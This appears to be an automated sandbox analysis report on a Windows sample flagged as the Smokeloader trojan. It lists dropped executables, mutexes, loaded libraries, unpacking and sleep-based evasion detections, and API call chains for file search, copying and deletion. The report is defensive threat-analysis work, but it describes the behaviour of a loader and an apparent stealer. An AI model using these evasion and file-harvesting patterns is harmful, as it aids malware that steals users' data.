Source: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: EbXj93v3bO.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BB02.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@1/3

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_00B3EC36 CreateToolhelp32Snapshot,Module32First,

0_2_00B3EC36

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Code function: 1_2_024FCE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_024FCE47

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7928

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

File created: C:\Users\user\AppData\Local\Temp\BB02.tmp

Jump to behavior

Source: EbXj93v3bO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EbXj93v3bO.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\EbXj93v3bO.exe "C:\Users\user\Desktop\EbXj93v3bO.exe"
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Process created: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe "C:\Users\user\AppData\Local\Temp\BB02.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 1292
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Process created: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe "C:\Users\user\AppData\Local\Temp\BB02.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe

Unpacked PE file: 1.2.BB02.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Unpacked PE file: 0.2.EbXj93v3bO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Unpacked PE file: 1.2.BB02.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd	0_2_0043DB7B
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B3E09E pushad ; ret	0_2_00B3E0A5
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B4138C pushad ; ret	0_2_00B413B4
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B4182D push 00000003h; ret	0_2_00B41831
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B3FA82 push es; iretd	0_2_00B3FA93
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B43E3A pushad ; ret	0_2_00B43E56
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_00B43FB8 push ecx; ret	0_2_00B43FD5
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_025209CD push ecx; ret	0_2_025209E0
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0254799F push esp; retf	0_2_025479A7
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0252CE18 push ss; retf	0_2_0252CE1D
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_0251FFF3 push ecx; ret	0_2_02520006
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02547F9D push esp; retf	0_2_02547F9E
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Code function: 0_2_02549DE8 pushad ; retf	0_2_02549DEF
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A1F0E8 push 00000032h; retf	1_2_00A1F0EA
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A1E0C8 push ebx; ret	1_2_00A1E12D
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A20067 push B35707CFh; iretd	1_2_00A2015B
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A20067 pushad ; iretd	1_2_00A201D9
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A21A65 push edx; iretd	1_2_00A21A76
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A20F6E push ebp; iretd	1_2_00A20FA1
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_00A2015C pushad ; iretd	1_2_00A201D9
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_02507B2C push ecx; ret	1_2_02507B3F

Source: EbXj93v3bO.exe	Static PE information: section name: .text entropy: 7.556532829734777
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.108723989240935
Source: BB02.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.108723989240935

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	File created: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe			Jump to dropped file

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe

Window / User API: threadDelayed 9642

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Evasive API call chain: GetSystemTime,DecisionNodes			graph_1-32649
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-64261

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	API coverage: 3.8 %

Source: C:\Users\user\Desktop\EbXj93v3bO.exe TID: 7904	Thread sleep count: 350 > 30	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe TID: 7904	Thread sleep time: -252700s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe TID: 7904	Thread sleep count: 9642 > 30	Jump to behavior
Source: C:\Users\user\Desktop\EbXj93v3bO.exe TID: 7904	Thread sleep time: -6961524s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\EbXj93v3bO.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024F1EA7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024FCF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024FCF47
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F3F27
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024EDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024EDFD7
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024E1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_024E1807
Source: C:\Users\user\AppData\Local\Temp\BB02.tmp.exe	Code function: 1_2_024F1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_024F1827
